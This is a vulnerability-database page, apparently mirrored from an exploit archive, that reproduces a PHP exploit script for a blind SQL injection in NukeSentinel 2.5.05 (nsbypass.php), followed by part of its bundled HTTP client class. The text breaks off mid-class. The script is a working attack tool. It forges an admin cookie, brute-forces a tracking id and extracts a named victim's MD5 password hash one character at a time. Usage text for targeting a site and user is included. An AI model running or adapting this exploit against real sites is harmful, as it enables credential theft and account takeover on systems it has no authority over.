Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit

🗓️ 22 Feb 2007 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 48 Views

NukeSentinel 2.5.05 (nsbypass.php) Blind SQL Injection Exploit. Exploit for NukeSentinel version 2.5.05 including details of affected versions, conditions, usage, and options

Code

                                                #!/usr/bin/php
<?php
error_reporting(E_ALL&nbsp;^&nbsp;E_NOTICE);

#&nbsp;(changes.txt)
#
#&nbsp;2.5.05&nbsp;CHANGES&nbsp;(2007-01-22):
#&nbsp;+&nbsp;Includes&nbsp;IP2Country&nbsp;2007-01-19&nbsp;updated&nbsp;imports.
#&nbsp;&nbsp;&nbsp;-&nbsp;Both&nbsp;data&nbsp;and&nbsp;sql&nbsp;versions.&nbsp;(Not&nbsp;in&nbsp;upgrade&nbsp;package)
#&nbsp;+&nbsp;Moved&nbsp;nsbypass.php&nbsp;into&nbsp;the&nbsp;includes&nbsp;directory&nbsp;(Per&nbsp;User&nbsp;Requests).
#
#&nbsp;Prior&nbsp;versions&nbsp;may&nbsp;also&nbsp;be&nbsp;vulnerable&nbsp;but&nbsp;this&nbsp;exploit&nbsp;will&nbsp;not&nbsp;work
#&nbsp;for&nbsp;these&nbsp;versions&nbsp;(because&nbsp;the&nbsp;file&nbsp;\'nsbypass.php\'&nbsp;is&nbsp;not&nbsp;into&nbsp;the
#&nbsp;includes&nbsp;directory).
#

if($argc&nbsp;<&nbsp;5)&nbsp;{
print(\"
&nbsp;&nbsp;NukeSentinel&nbsp;2.5.05&nbsp;(nsbypass.php)&nbsp;Blind&nbsp;SQL&nbsp;Injection&nbsp;Exploit
------------------------------------------------------------------
PHP&nbsp;conditions:&nbsp;none
CMS&nbsp;conditions:&nbsp;disable_switch<=0&nbsp;(module&nbsp;activated),&nbsp;track_active=1
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Credits:&nbsp;DarkFig&nbsp;<[email protected]>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;URL:&nbsp;http://www.acid-root.new.fr/
------------------------------------------------------------------
&nbsp;&nbsp;Usage:&nbsp;$argv[0]&nbsp;-url&nbsp;<url>&nbsp;-victim&nbsp;<username>&nbsp;[Opts]
Options:&nbsp;-isadmin&nbsp;&nbsp;&nbsp;Is&nbsp;the&nbsp;victim&nbsp;an&nbsp;Admin&nbsp;(1)&nbsp;or&nbsp;a&nbsp;normal&nbsp;user&nbsp;(default=0)&nbsp;?
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-prefix&nbsp;&nbsp;&nbsp;&nbsp;Table&nbsp;prefix&nbsp;(default=nuke)
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-tid&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;have&nbsp;already&nbsp;used&nbsp;this&nbsp;sploit
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-bf&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;You&nbsp;can&nbsp;precise&nbsp;how&nbsp;many&nbsp;hits&nbsp;we&nbsp;can&nbsp;try
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;If&nbsp;you&nbsp;wanna&nbsp;use&nbsp;a&nbsp;proxy&nbsp;<proxyhost:proxyport>&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;-proxyauth&nbsp;Basic&nbsp;authentification&nbsp;<proxyuser:proxypwd>&nbsp;
------------------------------------------------------------------
\");&nbsp;exit(1);
}

$url&nbsp;&nbsp;&nbsp;=&nbsp;getparam(\'url\',1);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;http://localhost/php-nuke-7.9/html/
$login&nbsp;=&nbsp;getparam(\'victim\',1);&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;Default&nbsp;&nbsp;&nbsp;#&nbsp;Victim&nbsp;(root&nbsp;for&nbsp;example)
$admin&nbsp;=&nbsp;(getparam(\'isadmin\')!=\'\')&nbsp;?&nbsp;getparam(\'isadmin\')&nbsp;:&nbsp;0;
$prfix&nbsp;=&nbsp;(getparam(\'prefix\')!=\'\')&nbsp;&nbsp;?&nbsp;getparam(\'prefix\')&nbsp;&nbsp;:&nbsp;\'nuke\';
$tid&nbsp;&nbsp;&nbsp;=&nbsp;(getparam(\'tid\')!=\'\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;getparam(\'tid\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;0;
$nbtst&nbsp;=&nbsp;(getparam(\'bf\')!=\'\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;?&nbsp;getparam(\'bf\')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;:&nbsp;10000;
$proxy&nbsp;=&nbsp;getparam(\'proxy\');
$authp&nbsp;=&nbsp;getparam(\'proxyauth\');

$xpl&nbsp;=&nbsp;new&nbsp;phpsploit();
$xpl->agent(\"Mozilla&nbsp;Firefox\");
if($proxy)&nbsp;$xpl->proxy($proxy);
if($authp)&nbsp;$xpl->proxyauth($authp);

#&nbsp;+nukesentinel.php
#&nbsp;49.&nbsp;&nbsp;if($ab_config[\'disable_switch\']&nbsp;>&nbsp;0)&nbsp;{&nbsp;return;&nbsp;}
#&nbsp;414.&nbsp;if($ab_config[\'track_active\']&nbsp;==&nbsp;1&nbsp;AND&nbsp;!is_excluded($nsnst_const[\'remote_ip\']))&nbsp;{
#&nbsp;458.&nbsp;$db->sql_query(\"INSERT&nbsp;INTO&nbsp;`\".$prefix.\"_nsnst_tracked_ips`&nbsp;(`user_id`,&nbsp;`username`,&nbsp;`date`,&nbsp;`ip_addr`,&nbsp;`ip_long`,&nbsp;`page`,
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`user_agent`,&nbsp;`refered_from`,&nbsp;`x_forward_for`,&nbsp;`client_ip`,&nbsp;`remote_addr`,&nbsp;`remote_port`,&nbsp;`request_method`,
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;`c2c`)&nbsp;VALUES&nbsp;(\'\".$nsnst_const[\'ban_user_id\'].\"\',&nbsp;\'$ban_username2\',&nbsp;\'\".$nsnst_const[\'ban_time\'].\"\',&nbsp;
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'remote_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_long\'].\"\',&nbsp;\'$pg\',&nbsp;\'$user_agent\',&nbsp;\'$refered_from\',
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'forward_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'client_ip\'].\"\',&nbsp;\'\".$nsnst_const[\'remote_addr\'].\"\',
#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;\'\".$nsnst_const[\'remote_port\'].\"\',&nbsp;\'\".$nsnst_const[\'request_method\'].\"\',&nbsp;\'$c2c\')\");
#
#&nbsp;We&nbsp;insert&nbsp;a&nbsp;row&nbsp;in&nbsp;$prefix.\"_nsnst_tracked_ips\".
#
print&nbsp;\"
Inserting&nbsp;a&nbsp;row&nbsp;in&nbsp;${prfix}_nsnst_tracked_ips\";
$xpl->addheader(\"Client-IP\",\"255.255.255.255\");
$xpl->get($url.\'index.php\');


#&nbsp;Trying&nbsp;to&nbsp;find&nbsp;a&nbsp;valid&nbsp;tid.
#&nbsp;Needed&nbsp;for&nbsp;$tum&nbsp;>&nbsp;0.
#
print&nbsp;\"
Trying&nbsp;to&nbsp;find&nbsp;a&nbsp;valid&nbsp;tid&nbsp;(max&nbsp;hits=$nbtst)\";
$sql&nbsp;=&nbsp;\"\'&nbsp;OR&nbsp;1=1#\";
$xpl->addcookie(\"admin\",urlencode(base64_encode($sql.\':1:\')));
for($c=$tid;$c<=$nbtst;$c++)
{
&nbsp;&nbsp;&nbsp;&nbsp;$xpl->get($url.\"includes/nsbypass.php?tid=$c\");
&nbsp;&nbsp;&nbsp;&nbsp;if(!preg_match(\"#phpnuke.org#\",$xpl->getheader()))
&nbsp;&nbsp;&nbsp;&nbsp;{
&nbsp;&nbsp;&nbsp;&nbsp;	$tid&nbsp;=&nbsp;$c;
&nbsp;&nbsp;&nbsp;&nbsp;	print&nbsp;\"
Valid&nbsp;tid&nbsp;found:&nbsp;$tid
Hash:&nbsp;$login&nbsp;->&nbsp;\";
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;break;
&nbsp;&nbsp;&nbsp;&nbsp;}
&nbsp;&nbsp;&nbsp;&nbsp;if($c&nbsp;==&nbsp;$nbtst)&nbsp;exit(\"
#1&nbsp;Exploit&nbsp;failed\");
}


#&nbsp;MD5&nbsp;hash&nbsp;length&nbsp;[32]
#
for($a=1;$a<=32;$a++)
{
	#&nbsp;MD5&nbsp;charset&nbsp;[a-f0-9]
	#
	for($b=48;$b<=71;$b++)
	{
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&nbsp;+nsbypass.php
		#&nbsp;24.&nbsp;$num&nbsp;=&nbsp;$db->sql_numrows($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_authors&nbsp;WHERE&nbsp;`aid`=\'$a_aid\'&nbsp;AND&nbsp;`pwd`=\'$a_pas\'\"));
		#&nbsp;25.&nbsp;$tum&nbsp;=&nbsp;$db->sql_numrows($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_nsnst_tracked_ips&nbsp;WHERE&nbsp;`tid`=\'$tid\'\"));
		#&nbsp;
		if($admin)&nbsp;$sql&nbsp;=&nbsp;\"$login\'&nbsp;AND&nbsp;SUBSTR(pwd,$a,1)=CHAR($b)#\";
		else&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;$sql&nbsp;=&nbsp;\"\'&nbsp;OR&nbsp;SUBSTR((SELECT&nbsp;user_password&nbsp;FROM&nbsp;${prfix}_users&nbsp;WHERE&nbsp;username=\'$login\'),$a,1)=CHAR($b)#\";
		
		#&nbsp;+nsbypass.php
		#&nbsp;16.&nbsp;$tid&nbsp;=&nbsp;intval($tid);
		#&nbsp;17.&nbsp;if(isset($_COOKIE[\'admin\'])&nbsp;&&&nbsp;!empty($_COOKIE[\'admin\']))&nbsp;{
		#&nbsp;18.&nbsp;$abadmin&nbsp;=&nbsp;base64_decode($_COOKIE[\'admin\']);
		#&nbsp;19.&nbsp;$abadmin&nbsp;=&nbsp;explode(\":\",&nbsp;$abadmin);
		#&nbsp;20.&nbsp;$a_aid&nbsp;=&nbsp;\"$abadmin[0]\";
		#&nbsp;21.&nbsp;$a_pas&nbsp;=&nbsp;\"$abadmin[1]\";
		#&nbsp;22.&nbsp;}
		#
		$xpl->addcookie(\"admin\",urlencode(base64_encode($sql.\':1:\')));
		$xpl->get($url.\"includes/nsbypass.php?tid=$tid\");

		#&nbsp;+nsbypass.php
		#&nbsp;27.&nbsp;if($num&nbsp;>&nbsp;0&nbsp;AND&nbsp;$tum&nbsp;>&nbsp;0)&nbsp;{
		#&nbsp;28.&nbsp;$row&nbsp;=&nbsp;$db->sql_fetchrow($db->sql_query(\"SELECT&nbsp;*&nbsp;FROM&nbsp;\".$prefix.\"_nsnst_tracked_ips&nbsp;WHERE&nbsp;`tid`=\'$tid\'\"));
		#&nbsp;29.&nbsp;$row[\'refered_from\']&nbsp;=&nbsp;html_entity_decode($row[\'refered_from\'],&nbsp;ENT_QUOTES);
		#&nbsp;30.&nbsp;header(\"Location:&nbsp;\".$row[\'refered_from\']);
		#&nbsp;31.&nbsp;}&nbsp;else&nbsp;{
		#&nbsp;32.&nbsp;header(\"Location:&nbsp;\".$nuke_config[\'nukeurl\']);
		#&nbsp;33.&nbsp;}
		#
		if(!preg_match(\"#phpnuke.org#\",$xpl->getheader()))
		{
			print&nbsp;strtolower(chr($b));
			break;
		}
		
		#&nbsp;MD5&nbsp;hash&nbsp;do&nbsp;not&nbsp;contains&nbsp;g&nbsp;(char(71))&nbsp;...&nbsp;WTF&nbsp;!?
		#
		if($b&nbsp;==&nbsp;71)&nbsp;exit(\"
#2&nbsp;Exploit&nbsp;failed\");
	}
}


#&nbsp;-url&nbsp;\"http://www.victim.com/\"
#&nbsp;-url&nbsp;http://www.victim.com/
#&nbsp;getparam(\'url\',1)
#
function&nbsp;getparam($param,$opt=\'\')
{
	global&nbsp;$argv;
	foreach($argv&nbsp;as&nbsp;$value&nbsp;=>&nbsp;$key)
	{
		if($key&nbsp;==&nbsp;\'-\'.$param)&nbsp;return&nbsp;$argv[$value+1];
	}
	if($opt)&nbsp;exit(\"
#3&nbsp;-$param&nbsp;parameter&nbsp;required\");
	else&nbsp;return;
}

/*
&nbsp;*&nbsp;
&nbsp;*&nbsp;Copyright&nbsp;(C)&nbsp;darkfig
&nbsp;*&nbsp;
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;free&nbsp;software;&nbsp;you&nbsp;can&nbsp;redistribute&nbsp;it&nbsp;and/or&nbsp;
&nbsp;*&nbsp;modify&nbsp;it&nbsp;under&nbsp;the&nbsp;terms&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;
&nbsp;*&nbsp;as&nbsp;published&nbsp;by&nbsp;the&nbsp;Free&nbsp;Software&nbsp;Foundation;&nbsp;either&nbsp;version&nbsp;2&nbsp;
&nbsp;*&nbsp;of&nbsp;the&nbsp;License,&nbsp;or&nbsp;(at&nbsp;your&nbsp;option)&nbsp;any&nbsp;later&nbsp;version.&nbsp;
&nbsp;*&nbsp;
&nbsp;*&nbsp;This&nbsp;program&nbsp;is&nbsp;distributed&nbsp;in&nbsp;the&nbsp;hope&nbsp;that&nbsp;it&nbsp;will&nbsp;be&nbsp;useful,&nbsp;
&nbsp;*&nbsp;but&nbsp;WITHOUT&nbsp;ANY&nbsp;WARRANTY;&nbsp;without&nbsp;even&nbsp;the&nbsp;implied&nbsp;warranty&nbsp;of&nbsp;
&nbsp;*&nbsp;MERCHANTABILITY&nbsp;or&nbsp;FITNESS&nbsp;FOR&nbsp;A&nbsp;PARTICULAR&nbsp;PURPOSE.&nbsp;&nbsp;See&nbsp;the&nbsp;
&nbsp;*&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;for&nbsp;more&nbsp;details.&nbsp;
&nbsp;*&nbsp;
&nbsp;*&nbsp;You&nbsp;should&nbsp;have&nbsp;received&nbsp;a&nbsp;copy&nbsp;of&nbsp;the&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License&nbsp;
&nbsp;*&nbsp;along&nbsp;with&nbsp;this&nbsp;program;&nbsp;if&nbsp;not,&nbsp;write&nbsp;to&nbsp;the&nbsp;Free&nbsp;Software&nbsp;
&nbsp;*&nbsp;Foundation,&nbsp;Inc.,&nbsp;59&nbsp;Temple&nbsp;Place&nbsp;-&nbsp;Suite&nbsp;330,&nbsp;Boston,&nbsp;MA&nbsp;&nbsp;02111-1307,&nbsp;USA.
&nbsp;*&nbsp;
&nbsp;*&nbsp;TITLE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;PhpSploit&nbsp;Class
&nbsp;*&nbsp;REQUIREMENTS:&nbsp;&nbsp;&nbsp;PHP&nbsp;5&nbsp;(remove&nbsp;\"private\",&nbsp;\"public\"&nbsp;if&nbsp;you&nbsp;have&nbsp;PHP&nbsp;4)
&nbsp;*&nbsp;VERSION:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1.2
&nbsp;*&nbsp;LICENSE:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;GNU&nbsp;General&nbsp;Public&nbsp;License
&nbsp;*&nbsp;ORIGINAL&nbsp;URL:&nbsp;&nbsp;&nbsp;http://www.acid-root.new.fr/tools/03061230.txt
&nbsp;*&nbsp;FILENAME:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;phpsploitclass.php
&nbsp;*
&nbsp;*&nbsp;CONTACT:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;[email protected]&nbsp;(french&nbsp;/&nbsp;english)
&nbsp;*&nbsp;GREETZ:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Sparah,&nbsp;Ddx39
&nbsp;*
&nbsp;*&nbsp;DESCRIPTION:
&nbsp;*&nbsp;The&nbsp;phpsploit&nbsp;is&nbsp;a&nbsp;class&nbsp;implementing&nbsp;a&nbsp;web&nbsp;user&nbsp;agent.
&nbsp;*&nbsp;You&nbsp;can&nbsp;add&nbsp;cookies,&nbsp;headers,&nbsp;use&nbsp;a&nbsp;proxy&nbsp;server&nbsp;with&nbsp;(or&nbsp;without)&nbsp;a
&nbsp;*&nbsp;basic&nbsp;authentification.&nbsp;It&nbsp;supports&nbsp;the&nbsp;GET&nbsp;and&nbsp;the&nbsp;POST&nbsp;method.&nbsp;It&nbsp;can
&nbsp;*&nbsp;also&nbsp;be&nbsp;used&nbsp;like&nbsp;a&nbsp;browser&nbsp;with&nbsp;the&nbsp;cookiejar()&nbsp;function&nbsp;(which&nbsp;allow
&nbsp;*&nbsp;a&nbsp;server&nbsp;to&nbsp;add&nbsp;several&nbsp;cookies&nbsp;for&nbsp;the&nbsp;next&nbsp;requests)&nbsp;and&nbsp;the
&nbsp;*&nbsp;allowredirection()&nbsp;function&nbsp;(which&nbsp;allow&nbsp;the&nbsp;script&nbsp;to&nbsp;follow&nbsp;all
&nbsp;*&nbsp;redirections&nbsp;sent&nbsp;by&nbsp;the&nbsp;server).&nbsp;It&nbsp;can&nbsp;return&nbsp;the&nbsp;content&nbsp;(or&nbsp;the
&nbsp;*&nbsp;headers)&nbsp;of&nbsp;the&nbsp;request.&nbsp;Others&nbsp;useful&nbsp;functions&nbsp;can&nbsp;be&nbsp;used&nbsp;for&nbsp;debugging.
&nbsp;*&nbsp;A&nbsp;manual&nbsp;is&nbsp;actually&nbsp;in&nbsp;development&nbsp;but&nbsp;to&nbsp;know&nbsp;how&nbsp;to&nbsp;use&nbsp;it,&nbsp;you&nbsp;can
&nbsp;*&nbsp;read&nbsp;the&nbsp;comments.
&nbsp;*
&nbsp;*&nbsp;CHANGELOG:
&nbsp;*&nbsp;[2007-01-24]&nbsp;(1.2)
&nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#2&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;getcookie()&nbsp;function&nbsp;((|;))
&nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;multipart/form-data&nbsp;enctype&nbsp;is&nbsp;now&nbsp;supported&nbsp;
&nbsp;*
&nbsp;*&nbsp;[2006-12-31]&nbsp;(1.1)
&nbsp;*&nbsp;&nbsp;*&nbsp;Bug&nbsp;#1&nbsp;fixed:&nbsp;Problem&nbsp;concerning&nbsp;the&nbsp;allowredirection()&nbsp;function&nbsp;(chr(13)&nbsp;bug)
&nbsp;*&nbsp;&nbsp;*&nbsp;New:&nbsp;You&nbsp;can&nbsp;now&nbsp;call&nbsp;the&nbsp;getheader()&nbsp;/&nbsp;getcontent()&nbsp;function&nbsp;without&nbsp;parameters
&nbsp;*
&nbsp;*&nbsp;[2006-12-30]&nbsp;(1.0)
&nbsp;*&nbsp;&nbsp;*&nbsp;First&nbsp;version
&nbsp;*&nbsp;
&nbsp;*/

class&nbsp;phpsploit&nbsp;{

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;is&nbsp;called&nbsp;by&nbsp;the&nbsp;get()/post()&nbsp;functions.
	&nbsp;*&nbsp;You&nbsp;don\'t&nbsp;have&nbsp;to&nbsp;call&nbsp;it,&nbsp;this&nbsp;is&nbsp;the&nbsp;main&nbsp;function.
	&nbsp;*
	&nbsp;*&nbsp;@return&nbsp;$server_response
	&nbsp;*/
	private&nbsp;function&nbsp;sock()
	{
		if(!empty($this->proxyhost)&nbsp;&&&nbsp;!empty($this->proxyport))&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->proxyhost,$this->proxyport);
		else&nbsp;$socket&nbsp;=&nbsp;fsockopen($this->host,$this->port);
		
		if(!$socket)&nbsp;die(\"Error:&nbsp;The&nbsp;host&nbsp;doesn\'t&nbsp;exist\");
		
		if($this->method===\"get\")&nbsp;$this->packet&nbsp;=&nbsp;\"GET&nbsp;\".$this->url.\"&nbsp;HTTP/1.1
\";
		elseif($this->method===\"post\"&nbsp;or&nbsp;$this->method===\"formdata\")&nbsp;$this->packet&nbsp;=&nbsp;\"POST&nbsp;\".$this->url.&nbsp;\"&nbsp;HTTP/1.1
\";
		else&nbsp;die(\"Error:&nbsp;Invalid&nbsp;method\");
		
		if(!empty($this->proxyuser))&nbsp;$this->packet&nbsp;.=&nbsp;\"Proxy-Authorization:&nbsp;Basic&nbsp;\".base64_encode($this->proxyuser.\":\".$this->proxypass).\"
\";
		$this->packet&nbsp;.=&nbsp;\"Host:&nbsp;\".$this->host.\"
\";
		
		if(!empty($this->agent))&nbsp;&nbsp;$this->packet&nbsp;.=&nbsp;\"User-Agent:&nbsp;\".$this->agent.\"
\";
		if(!empty($this->header))&nbsp;$this->packet&nbsp;.=&nbsp;$this->header.\"
\";
		if(!empty($this->cookie))&nbsp;$this->packet&nbsp;.=&nbsp;\"Cookie:&nbsp;\".$this->cookie.\"
\";
		
		$this->packet&nbsp;.=&nbsp;\"Connection:&nbsp;Close
\";
		if($this->method===\"post\")
		{
			$this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;application/x-www-form-urlencoded
\";
			$this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\"

\";
			$this->packet&nbsp;.=&nbsp;$this->data.\"
\";
		}
		elseif($this->method===\"formdata\")
		{
			$this->packet&nbsp;.=&nbsp;\"Content-Type:&nbsp;multipart/form-data;&nbsp;boundary=---------------------------\".$this->boundary.\"
\";
			$this->packet&nbsp;.=&nbsp;\"Content-Length:&nbsp;\".strlen($this->data).\"

\";
			$this->packet&nbsp;.=&nbsp;$this->data;
		}
		$this->packet&nbsp;.=&nbsp;\"
\";
		$this->recv&nbsp;=&nbsp;\'\';
		
		fputs($socket,$this->packet);
		while(!feof($socket))&nbsp;$this->recv&nbsp;.=&nbsp;fgets($socket);
		fclose($socket);
		
		if($this->cookiejar)&nbsp;$this->cookiejar($this->getheader($this->recv));
		if($this->allowredirection)&nbsp;return&nbsp;$this->allowredirection($this->recv);
		else&nbsp;return&nbsp;$this->recv;
	}
	

	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;cookie&nbsp;in&nbsp;the
	&nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;$this->addcookie(\"name\",\"value\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addcookie(\"name=newvalue\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addcookie(\"othername=overvalue;&nbsp;xx=zz;&nbsp;y=u\");
	&nbsp;*&nbsp;
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookiename
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$cookievalue
	&nbsp;*&nbsp;
	&nbsp;*/
	public&nbsp;function&nbsp;addcookie($cookn,$cookv=\'\')
	{
		//&nbsp;$this->addcookie(\"name\",\"value\");&nbsp;work&nbsp;avec&nbsp;replace
		if(!empty($cookv))
		{
			if($cookv&nbsp;===&nbsp;\"deleted\")&nbsp;$cookv=\'\';&nbsp;//&nbsp;cookiejar(1)&nbsp;&&&nbsp;Set-Cookie:&nbsp;name=delete
			if(!empty($this->cookie))
			{
			&nbsp;&nbsp;&nbsp;&nbsp;if(preg_match(\"/$cookn=/\",$this->cookie))
			&nbsp;&nbsp;&nbsp;&nbsp;{
			&nbsp;&nbsp;&nbsp;&nbsp;	$this->cookie&nbsp;=&nbsp;preg_replace(\"/$cookn=(S*);/\",\"$cookn=$cookv;\",$this->cookie);
			&nbsp;&nbsp;&nbsp;&nbsp;}
			&nbsp;&nbsp;&nbsp;&nbsp;else
			&nbsp;&nbsp;&nbsp;&nbsp;{
			&nbsp;&nbsp;&nbsp;&nbsp;	$this->cookie&nbsp;.=&nbsp;\"&nbsp;\".$cookn.\"=\".$cookv.\";\";&nbsp;//&nbsp;\"&nbsp;\".
			&nbsp;&nbsp;&nbsp;&nbsp;}
			}
			else
			{
				$this->cookie&nbsp;=&nbsp;$cookn.\"=\".$cookv.\";\";
			}
		}
		//&nbsp;$this->addcookie(\"name=value;&nbsp;othername=othervalue\");
		else
		{
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;if(!empty($this->cookie))
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;{
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	$cookn&nbsp;=&nbsp;preg_replace(\"/(.*);$/\",\"$1\",$cookn);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	$cookarr&nbsp;=&nbsp;explode(\";\",str_replace(\"&nbsp;\",&nbsp;\"\",$cookn));
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	for($i=0;$i<count($cookarr);$i++)
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	{
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		preg_match(\"/(S*)=(S*)/\",$cookarr[$i],$matches);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		$cookn&nbsp;=&nbsp;$matches[1];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		$cookv&nbsp;=&nbsp;$matches[2];
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;		$this->addcookie($cookn,$cookv);
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;	}
	&nbsp;&nbsp;&nbsp;&nbsp;	&nbsp;}
			&nbsp;else
			&nbsp;{
			&nbsp;	$cookn&nbsp;=&nbsp;((substr($cookn,(strlen($cookn)-1),1))===\";\")&nbsp;?&nbsp;$cookn&nbsp;:&nbsp;$cookn.\";\";
			&nbsp;	$this->cookie&nbsp;=&nbsp;$cookn;			
			&nbsp;}
		}
	}
	
	
	/**
	&nbsp;*&nbsp;This&nbsp;function&nbsp;allows&nbsp;you&nbsp;to&nbsp;add&nbsp;several&nbsp;headers&nbsp;in&nbsp;the
	&nbsp;*&nbsp;request.&nbsp;Several&nbsp;methods&nbsp;are&nbsp;supported:
	&nbsp;*
	&nbsp;*&nbsp;$this->addheader(\"headername\",\"headervalue\");
	&nbsp;*&nbsp;or
	&nbsp;*&nbsp;$this->addheader(\"headername:&nbsp;headervalue\");
	&nbsp;*
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$headername
	&nbsp;*&nbsp;@param&nbsp;string&nbsp;$headervalue
	&nbsp;*/
	public&nbsp;function&nbsp;addheader($headern,$headervalue=\'\')
	{
